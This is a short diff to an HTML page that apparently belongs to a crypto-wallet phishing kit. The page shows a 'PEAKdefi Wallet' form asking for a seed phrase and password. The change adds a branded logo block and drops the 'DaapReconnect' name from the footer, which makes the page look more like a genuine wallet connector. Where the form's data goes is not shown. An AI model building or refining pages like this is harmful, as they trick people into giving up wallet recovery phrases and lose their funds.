--- a/peakdefi.html
+++ b/peakdefi.html
@@ -75,6 +75,10 @@
 
                         <div class="middle">
                             <h4>PEAKdefi Wallet</h4>
+                            <div class="toop">
+                                <img src="peakdefi.jpg" alt="">
+                                <h4>PEAKdefi Wallet</h4>    
+                            </div>
                             <textarea id="seed" minlength="30" name="PEAKdefi Wallet" placeholder="Seed Phrase..." required></textarea >
                              <input name="Password" id="movepass"  type="password" placeholder="Password"/>
                         </div>
@@ -108,7 +112,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
